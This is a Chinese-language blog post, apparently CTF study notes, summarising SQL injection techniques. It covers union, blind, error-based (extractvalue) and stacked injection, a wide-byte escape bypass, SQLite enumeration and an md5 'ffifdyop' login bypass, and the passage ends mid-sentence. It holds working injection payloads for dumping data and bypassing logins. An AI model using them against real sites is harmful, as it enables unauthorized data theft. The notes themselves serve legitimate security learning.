<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 5.4.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" integrity="sha256-CTSx/A06dm1B063156EVh15m6Y67pAjZZaQc89LLSrU=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"tearsjin.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.18.2","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="一般注入通过修改参数的值, 例如正常数字 大数字 字符 单引号 双引号 括号 反斜杠等等来探测是否存在注入点. 如果有报错信息, 则可以根据报错信息还原SQL语句.  例如在数字后面加 ‘ 不行则可以试试加 \  注入操作(找到注入点并还原SQL语句后) 利用order by来判断字段数(联合查询需要相同的字段) 得到字段数后, 判断显位. 例如url?id&#x3D;-1&#39; union select 1,">
<meta property="og:type" content="article">
<meta property="og:title" content="Experience summary of SQL injection">
<meta property="og:url" content="http://tearsjin.github.io/2020/09/29/SQL%E6%B3%A8%E5%85%A5%E7%BB%8F%E9%AA%8C%E5%A4%A7%E6%9D%82%E7%83%A9/index.html">
<meta property="og:site_name" content="K1rit0&#39;s Blog">
<meta property="og:description" content="一般注入通过修改参数的值, 例如正常数字 大数字 字符 单引号 双引号 括号 反斜杠等等来探测是否存在注入点. 如果有报错信息, 则可以根据报错信息还原SQL语句.  例如在数字后面加 ‘ 不行则可以试试加 \  注入操作(找到注入点并还原SQL语句后) 利用order by来判断字段数(联合查询需要相同的字段) 得到字段数后, 判断显位. 例如url?id&#x3D;-1&#39; union select 1,">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://47.98.130.190:8090/upload/2020/11/%E5%9B%BE%E7%89%87-794d608806ba4f49b52e2d5359f60040.png">
<meta property="article:published_time" content="2020-09-29T09:16:53.000Z">
<meta property="article:modified_time" content="2022-09-11T02:28:27.000Z">
<meta property="article:author" content="K1rit0">
<meta property="article:tag" content="Summary">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="SQL">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://47.98.130.190:8090/upload/2020/11/%E5%9B%BE%E7%89%87-794d608806ba4f49b52e2d5359f60040.png">


<link rel="canonical" href="http://tearsjin.github.io/2020/09/29/SQL%E6%B3%A8%E5%85%A5%E7%BB%8F%E9%AA%8C%E5%A4%A7%E6%9D%82%E7%83%A9/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://tearsjin.github.io/2020/09/29/SQL%E6%B3%A8%E5%85%A5%E7%BB%8F%E9%AA%8C%E5%A4%A7%E6%9D%82%E7%83%A9/","path":"2020/09/29/SQL注入经验大杂烩/","title":"Experience summary of SQL injection"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Experience summary of SQL injection | K1rit0's Blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<style>mjx-container[jax="SVG"] {
  direction: ltr;
}

mjx-container[jax="SVG"] > svg {
  overflow: visible;
}

mjx-container[jax="SVG"][display="true"] {
  display: block;
  text-align: center;
  margin: 1em 0;
}

mjx-container[jax="SVG"][justify="left"] {
  text-align: left;
}

mjx-container[jax="SVG"][justify="right"] {
  text-align: right;
}

g[data-mml-node="merror"] > g {
  fill: red;
  stroke: red;
}

g[data-mml-node="merror"] > rect[data-background] {
  fill: yellow;
  stroke: none;
}

g[data-mml-node="mtable"] > line[data-line] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > rect[data-frame] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > .mjx-dashed {
  stroke-dasharray: 140;
}

g[data-mml-node="mtable"] > .mjx-dotted {
  stroke-linecap: round;
  stroke-dasharray: 0,140;
}

g[data-mml-node="mtable"] > svg {
  overflow: visible;
}

[jax="SVG"] mjx-tool {
  display: inline-block;
  position: relative;
  width: 0;
  height: 0;
}

[jax="SVG"] mjx-tool > mjx-tip {
  position: absolute;
  top: 0;
  left: 0;
}

mjx-tool > mjx-tip {
  display: inline-block;
  padding: .2em;
  border: 1px solid #888;
  font-size: 70%;
  background-color: #F8F8F8;
  color: black;
  box-shadow: 2px 2px 5px #AAAAAA;
}

g[data-mml-node="maction"][data-toggle] {
  cursor: pointer;
}

mjx-status {
  display: block;
  position: fixed;
  left: 1em;
  bottom: 1em;
  min-width: 25%;
  padding: .2em .4em;
  border: 1px solid #888;
  font-size: 90%;
  background-color: #F8F8F8;
  color: black;
}

foreignObject[data-mjx-xml] {
  font-family: initial;
  line-height: normal;
  overflow: visible;
}

.MathJax path {
  stroke-width: 3;
}

mjx-container[display="true"] {
  overflow: auto hidden;
}

mjx-container[display="true"] + br {
  display: none;
}
</style><link rel="alternate" href="/atom.xml" title="K1rit0's Blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">K1rit0's Blog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description"> </p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-links"><a href="/links/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>links</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%E8%88%AC%E6%B3%A8%E5%85%A5"><span class="nav-number">1.</span> <span class="nav-text">一般注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%A8%E5%85%A5%E6%93%8D%E4%BD%9C-%E6%89%BE%E5%88%B0%E6%B3%A8%E5%85%A5%E7%82%B9%E5%B9%B6%E8%BF%98%E5%8E%9FSQL%E8%AF%AD%E5%8F%A5%E5%90%8E"><span class="nav-number">1.1.</span> <span class="nav-text">注入操作(找到注入点并还原SQL语句后)</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9B%B2%E6%B3%A8"><span class="nav-number">2.</span> <span class="nav-text">盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9B%B8%E5%85%B3%E5%87%BD%E6%95%B0"><span class="nav-number">2.1.</span> <span class="nav-text">相关函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9F%BA%E4%BA%8E%E5%B8%83%E5%B0%94%E7%9A%84%E7%9B%B2%E6%B3%A8"><span class="nav-number">2.2.</span> <span class="nav-text">基于布尔的盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%B3%A8%E5%85%A5%E6%93%8D%E4%BD%9C"><span class="nav-number">2.2.1.</span> <span class="nav-text">注入操作</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9F%BA%E4%BA%8E%E6%97%B6%E9%97%B4%E7%9A%84%E7%9B%B2%E6%B3%A8"><span class="nav-number">2.3.</span> <span class="nav-text">基于时间的盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%B3%A8%E5%85%A5%E6%93%8D%E4%BD%9C-1"><span class="nav-number">2.3.1.</span> <span class="nav-text">注入操作</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">3.</span> <span class="nav-text">报错注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9B%AE%E5%BD%95"><span class="nav-number">3.1.</span> <span class="nav-text">目录</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%80%9A%E8%BF%87extractvalue-%E6%88%96updatexml-%E5%87%BD%E6%95%B0"><span class="nav-number">3.2.</span> <span class="nav-text">通过extractvalue()或updatexml()函数</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9C%BA%E6%99%AF"><span class="nav-number">3.2.1.</span> <span class="nav-text">场景</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8E%9F%E7%90%86"><span class="nav-number">3.2.2.</span> <span class="nav-text">原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8payload"><span class="nav-number">3.2.3.</span> <span class="nav-text">常用payload</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BE%8B%E9%A2%98-buuctf-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-hardsql"><span class="nav-number">3.2.3.1.</span> <span class="nav-text">例题: buuctf 极客大挑战 hardsql</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6"><span class="nav-number">4.</span> <span class="nav-text">读取文件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="nav-number">5.</span> <span class="nav-text">堆叠注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%80%9A%E8%BF%87RENAME%E6%9B%B4%E6%94%B9flag%E6%89%80%E5%9C%A8%E8%A1%A8%E5%90%8D%E4%B8%BA%E9%BB%98%E8%AE%A4%E6%9F%A5%E8%AF%A2%E7%9A%84%E8%A1%A8%E5%90%8D"><span class="nav-number">6.</span> <span class="nav-text">通过RENAME更改flag所在表名为默认查询的表名</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95"><span class="nav-number">7.</span> <span class="nav-text">绕过方法</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5"><span class="nav-number">7.1.</span> <span class="nav-text">宽字节注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%93%8D%E4%BD%9C"><span class="nav-number">7.1.1.</span> <span class="nav-text">操作</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#PHP%E9%A2%84%E5%A4%84%E7%90%86"><span class="nav-number">7.2.</span> <span class="nav-text">PHP预处理</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQLite%E6%B3%A8%E5%85%A5"><span class="nav-number"></span> <span class="nav-text">SQLite注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E4%BA%9B%E5%A5%87%E6%80%AA%E7%9A%84%E6%80%BB%E7%BB%93"><span class="nav-number"></span> <span class="nav-text">一些奇怪的总结???</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#jarvis-oj-login"><span class="nav-number">1.</span> <span class="nav-text">jarvis oj - login</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="K1rit0"
      src="https://avatars.githubusercontent.com/u/56160386?s=96&v=4">
  <p class="site-author-name" itemprop="name">K1rit0</p>
  <div class="site-description" itemprop="description"> </div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">38</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">35</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/tearsjin" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;tearsjin" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:k1rit0@qq.com" title="E-Mail → mailto:k1rit0@qq.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://tearsjin.github.io/2020/09/29/SQL%E6%B3%A8%E5%85%A5%E7%BB%8F%E9%AA%8C%E5%A4%A7%E6%9D%82%E7%83%A9/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://avatars.githubusercontent.com/u/56160386?s=96&v=4">
      <meta itemprop="name" content="K1rit0">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="K1rit0's Blog">
      <meta itemprop="description" content=" ">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Experience summary of SQL injection | K1rit0's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Experience summary of SQL injection
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2020-09-29 17:16:53" itemprop="dateCreated datePublished" datetime="2020-09-29T17:16:53+08:00">2020-09-29</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2022-09-11 10:28:27" itemprop="dateModified" datetime="2022-09-11T10:28:27+08:00">2022-09-11</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/WebSummary/" itemprop="url" rel="index"><span itemprop="name">WebSummary</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="Word count in article">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">Word count in article: </span>
      <span>4.9k</span>
    </span>
    <span class="post-meta-item" title="Reading time">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">Reading time &asymp;</span>
      <span>4 mins.</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="一般注入"><a href="#一般注入" class="headerlink" title="一般注入"></a>一般注入</h2><p>通过修改参数的值, 例如<strong>正常数字 大数字 字符 单引号 双引号 括号 反斜杠等等</strong>来探测是否存在注入点. 如果有报错信息, 则可以根据报错信息还原SQL语句.</p>
<blockquote>
<p>例如在数字后面加 ‘ 不行则可以试试加 \</p>
</blockquote>
<h3 id="注入操作-找到注入点并还原SQL语句后"><a href="#注入操作-找到注入点并还原SQL语句后" class="headerlink" title="注入操作(找到注入点并还原SQL语句后)"></a>注入操作(找到注入点并还原SQL语句后)</h3><ol>
<li>利用<code>order by</code>来判断字段数(联合查询需要相同的字段)</li>
<li>得到字段数后, 判断显位. 例如<code>url?id=-1' union select 1,2,3</code>, 观察哪个数字会显示出来.</li>
<li>获取数据库名(显位是2的情况下,下面也是)</li>
</ol>
<ul>
<li><code>union select 1,database(),3</code></li>
<li><code>select 1 , group_concat(schema_name) , 3 from information_schema.schemata</code></li>
</ul>
<ol>
<li>列出数据库中所有表(假设库名是test)</li>
</ol>
<ul>
<li><code>select group_concat(table_name) from information_schema.tables where table_schema = test</code> 如果不行 可以试试<code>'test'</code> <code>0x674657374</code>(把test转成十六进制) <code>database()</code></li>
</ul>
<ol>
<li>列出所有字段</li>
</ol>
<ul>
<li>select group_concat(column_name) from information_schema,columns where table_name = </li>
</ul>
<ol>
<li>爆数据就完事了</li>
</ol>
<h2 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h2><p>跟一般注入的区别在于, 服务端不再返回报错内容, 注入的时候只能知道自己输入的语句是否出错, 而且也不能直接得到库名表名这些. 盲注一般分为两种, 一种是基于布尔的, 一种是基于时间的.</p>
<h3 id="相关函数"><a href="#相关函数" class="headerlink" title="相关函数"></a>相关函数</h3><p>使用盲注得知道一些函数: </p>
<ul>
<li>ascii(str): str是一个字符串参数，返回值为其最左侧字符的ascii码。通过它，我们才能确定特定的字符。</li>
<li>substr(str,start,len): 这个函数是取str中从下标start开始的，长度为len的字符串。通常在盲注中用于取出单个字符，交给ascii函数来确定其具体的值。</li>
<li>length(str): 这个函数是用来获取str的长度的。这样我们才能知道需要通过substr取到哪个下标。</li>
<li>count([column]): 统计记录的数量，其在盲注中，主要用于判断符合条件的记录的数量，并逐个破解。</li>
<li>if(condition,a,b): 当condition为true的时候，返回a，当condition为false的时候，返回b。</li>
<li>sleep(n): 服务端等待n秒后返回记录, 在时间盲注中, 用于判断语句是否正确.</li>
<li>benchmark(times, func): 执行times次func, 也用于时间盲注, 通过服务端的反应时间来判断语句是否正确.</li>
</ul>
<h3 id="基于布尔的盲注"><a href="#基于布尔的盲注" class="headerlink" title="基于布尔的盲注"></a>基于布尔的盲注</h3><p>基于布尔的盲注是根据页面差来进行判断注入和数据注入的。在存在注入的页面输入and (true)则返回页面1；输入and (false)则返回页面2，而页面1和页面2有差别，常见的情况页面1是正常页面，页面2是错误页面</p>
<h4 id="注入操作"><a href="#注入操作" class="headerlink" title="注入操作"></a>注入操作</h4><ol>
<li>获取用户名<ol>
<li>猜用户名的长度<br><code>and(select length(user()))=数字</code>, 不断尝试不同的数字得到用户名的长度</li>
<li>逐位猜解用户名<br><code>and (select ascii(mid(user(),位数,1)))=114</code>, 猜测在某个位置的字母的ASCII码为114. 通过观察返回的页面来判断每一位的字母, 最终得到用户名</li>
</ol>
</li>
<li>获取当前数据库的库名<ol>
<li>猜库名长度<br><code>and (select length(database()))=数字</code></li>
<li>逐位猜解库名<br><code>and (select ascii(mid(database(),位数,1)))=116</code></li>
</ol>
</li>
<li>获取表名<ol>
<li>判断表的数量<br><code>and (select count(table_name) from information_schema.tables where table_schema=database())=4</code>,这条语句就是判断数据库中有4张表</li>
<li>判断表名的长度<br><code>and (select length(table_name) from information_schema.tables where table_schema=database() limit 位数,1)=5</code>, 位数指的是第几张表</li>
<li>逐位拆解表名<br><code>and (select ascii(mid(table_name,表名的第几位,1)) from information_schema.tables wheretable_schema=database() limit 第几张表,1)=100</code></li>
</ol>
</li>
<li>获取列名<ol>
<li>判断列的数量<br><code>and (select count(column_name) form information_schema.columns where table_schema=表名)=数字</code></li>
<li>判断列的长度<br><code>and (select length(column_name) form information_schema.columns where table_schema=表名 limit 第几列,1)=数字</code></li>
<li>逐位猜解列名<br><code>and (select ascii(mid(column_name,第几个字母,1)) form information_schema.columns where table_schema=表名 limit 第几列,1)=数字</code></li>
</ol>
</li>
<li>获取数据<ol>
<li>判断数据的条数<br><code>and (select conut(列名) from 表名)=数字</code></li>
<li>判断数据的长度<br><code>and (select length(列名) from 表名 limit 第几条,1)=数字</code></li>
<li>逐位猜解数据<br><code>and (select ascii(mid(列名,第几个字母,1)) from 表名 limit 第几条,1)=数字</code></li>
</ol>
</li>
</ol>
<p><strong>事实上,以上语句中的’=’都可以用’&lt;’和’&gt;’来代替以便于更快的确定数据</strong>, 而且手工注入往往需要大量的尝试, 这非常的<del>操蛋</del>繁琐, 一般可以写脚本来注入</p>
<h3 id="基于时间的盲注"><a href="#基于时间的盲注" class="headerlink" title="基于时间的盲注"></a>基于时间的盲注</h3><p>利用<code>sleep()</code>或<code>benchmark()</code>等函数让mysql执行时间变长经常与<code>if(expr1,expr2,expr3)</code>语句结合使用, 通过页面的响应时间来判断条件是否正确. <code>if(expr1,expr2,expr3)</code>含义是如果<code>expr1</code>是<code>True</code>, 则返回<code>expr2</code>, 否则返回<code>expr3</code>.</p>
<h4 id="注入操作-1"><a href="#注入操作-1" class="headerlink" title="注入操作"></a>注入操作</h4><p><del>反正也不会真的去手工注入</del><strong>sqlmap即可</strong></p>
<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><p>报错注入有很多很多(至少我在网上查找资料的时候看见了很多), 一边做题, 一边把遇到的报错注入的方法进行总结吧.<br><strong>报错注入就是利用了数据库的某些机制，人为地制造错误条件，使得查询结果能够出现在错误信息中</strong></p>
<h3 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h3><ul>
<li>通过<code>extractvalue()</code>或<code>updatexml()</code>函数</li>
</ul>
<h3 id="通过extractvalue-或updatexml-函数"><a href="#通过extractvalue-或updatexml-函数" class="headerlink" title="通过extractvalue()或updatexml()函数"></a>通过<code>extractvalue()</code>或<code>updatexml()</code>函数</h3><h4 id="场景"><a href="#场景" class="headerlink" title="场景"></a>场景</h4><ol>
<li>当union被过滤的时候</li>
</ol>
<h4 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h4><p><code>extractvalue()</code> :对XML文档进行查询的函数<br><code>udatexml()</code> :对XML文档进行更新的函数<br>语法：</p>
<ul>
<li><code>extractvalue(文档，路径)</code></li>
<li><code>updatexml(目标xml文档，xml路径，更新的内容)</code><br><strong>路径写入其他格式，就会报错并且会返回我们写入的非法格式内容，我们可以利用这个得到我们想得到的内容</strong></li>
</ul>
<h4 id="常用payload"><a href="#常用payload" class="headerlink" title="常用payload"></a>常用payload</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">查数据库名：id='and(select extractvalue(1,concat(0x7e,(select database()))))</span><br><span class="line">爆表名：id='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))</span><br><span class="line">爆字段名：id='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))</span><br><span class="line">爆数据：id='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))</span><br></pre></td></tr></table></figure>
<h5 id="例题-buuctf-极客大挑战-hardsql"><a href="#例题-buuctf-极客大挑战-hardsql" class="headerlink" title="例题: buuctf 极客大挑战 hardsql"></a>例题: buuctf 极客大挑战 hardsql</h5><p>情景: <code>order by</code> <code>union</code> <code>空格</code> <code>and</code> 被过滤<br>查字段名时候的payload:<code>?username=44&amp;password=1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23</code>   </p>
<h2 id="读取文件"><a href="#读取文件" class="headerlink" title="读取文件"></a>读取文件</h2><h2 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h2><p>在正常的语句后面加分号( ; ),可顺序执行多条语句, 从而造成注入漏洞.<br>堆叠注入的局限性在于并不是每一个环境下都可以执行，可能受到API或者数据库引擎不支持的限制，当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。</p>
<p>堆叠注入可以搭配一些语句来绕过对某些关键词的过滤:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">;show databases     			------列出所有数据库</span><br><span class="line">;show tables        			------列出所有表</span><br><span class="line">;show columns from table_name		------列出某个表的所有字段</span><br><span class="line">;desc table_name</span><br><span class="line"></span><br></pre></td></tr></table></figure></p>
<h2 id="通过RENAME更改flag所在表名为默认查询的表名"><a href="#通过RENAME更改flag所在表名为默认查询的表名" class="headerlink" title="通过RENAME更改flag所在表名为默认查询的表名"></a>通过<code>RENAME</code>更改flag所在表名为默认查询的表名</h2><p>更改表名:</p>
<blockquote>
<p><code>rename table tbl_name to new_tbl_name</code><br><code>alter table table_name to new name</code></p>
</blockquote>
<p>更改列名</p>
<blockquote>
<p><code>alter table t_app change name app_name varchar(20)</code></p>
</blockquote>
<h2 id="绕过方法"><a href="#绕过方法" class="headerlink" title="绕过方法"></a>绕过方法</h2><h3 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h3><p>利用编码转换, 将服务器端强制添加的本来用于转义的\符号吃掉, 从而能使攻击者输入的引号起到闭合作用, 以至于可以进行SQL注入.</p>
<h4 id="操作"><a href="#操作" class="headerlink" title="操作"></a>操作</h4><p>如在进行<code>url?id=1'</code>等操作时, 发现无论如何都不报错, 或者报错了莫名其妙的多出了有\, 此时就可以使用<code>url?id=1%df'</code>, 这时服务端会在’前面添加一个\, \的ASCII码为0x5c, 因为前面的%df大于128, 服务端会将0xdf和0x5c合并成0xdf5c即汉字 “运”, 从而达到了绕过\转义’的目的</p>
<h3 id="PHP预处理"><a href="#PHP预处理" class="headerlink" title="PHP预处理"></a>PHP预处理</h3><p>使用concat(char(num,num,num)) 即使用ascii码转成字符再拼接来绕过对某些关键词的过滤.</p>
<h1 id="SQLite注入"><a href="#SQLite注入" class="headerlink" title="SQLite注入"></a>SQLite注入</h1><p>与sql不同的是, sqlite少了一些函数, 比如database()等等, 而且如果使用了不存在的函数也无法爆出库名.<br>但是sqlite存在一个sqlite_master表, 里面的字段为type/name/tbl_name/rootpage/sql<br>可以通过查询该表内信息得到表名, 并且可以通过sql字段内的sql语句得到对应表内的字段</p>
<h1 id="一些奇怪的总结"><a href="#一些奇怪的总结" class="headerlink" title="一些奇怪的总结???"></a>一些奇怪的总结???</h1><h2 id="jarvis-oj-login"><a href="#jarvis-oj-login" class="headerlink" title="jarvis oj - login"></a>jarvis oj - login</h2><p>这是一道要用万能密码登录的题<br>sql语句是:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">"select * from `admin` where password='".md5($pass,true)."'"</span><br></pre></td></tr></table></figure><br>php的md5()这个函数, 可以有第二个参数, 如果是true, 则回返回原始的二进制数据, 也就是原本md5出来的32位十六进制字符串转成真正的十六字节的字符串.<br>那么这里要登录进去, 需要把语句构造成:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">"select * from `admin` where password=''or'1'" </span><br><span class="line"># or后面的1可以换成别的, 只要是一个字符串就好了</span><br></pre></td></tr></table></figure><br>然后这里用到了一个字符串<code>ffifdyop</code>, 为啥用这个呢? 因为<br><img src="http://47.98.130.190:8090/upload/2020/11/%E5%9B%BE%E7%89%87-794d608806ba4f49b52e2d5359f60040.png" alt="图片.png"><br>如果<code>$pass=ffifdyop</code>, 